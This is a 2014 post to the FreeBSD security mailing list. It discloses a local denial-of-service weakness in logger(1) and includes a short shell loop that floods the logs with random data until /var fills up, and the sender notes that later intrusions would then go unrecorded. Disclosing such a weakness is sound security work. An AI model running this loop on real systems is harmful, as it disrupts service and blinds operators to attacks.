From owner-freebsd-security@FreeBSD.ORG Mon May 26 03:26:45 2014 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1 with cipher ADH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 388F2427 for ; Mon, 26 May 2014 03:26:45 +0000 (UTC) Received: from outgoing.tristatelogic.com (segfault.tristatelogic.com [69.62.255.118]) by mx1.freebsd.org (Postfix) with ESMTP id 22B222E8C for ; Mon, 26 May 2014 03:26:44 +0000 (UTC) Received: from segfault-nmh-helo.tristatelogic.com (localhost [127.0.0.1]) by segfault.tristatelogic.com (Postfix) with ESMTP id 53BC53AD92 for ; Sun, 25 May 2014 20:26:44 -0700 (PDT) From: "Ronald F. Guilmette" To: freebsd-security@freebsd.org Subject: Local Denial of Service: logger(1) Date: Sun, 25 May 2014 20:26:44 -0700 Message-ID: <2091.1401074804@server1.tristatelogic.com> X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 May 2014 03:26:45 -0000 I can't have been the first person to to have thought of this... can I? ========================================================================== #!/bin/sh while (1) dd if=/dev/random bs=15 count=1 | od -c | xargs logger end ========================================================================== Ought to fill up the /var partition in due course. And perhaps more importantly, once it does, all manner of nefarious activities, perpetrated by all manner of miscreants, might ensue, none of which would be logged in any way.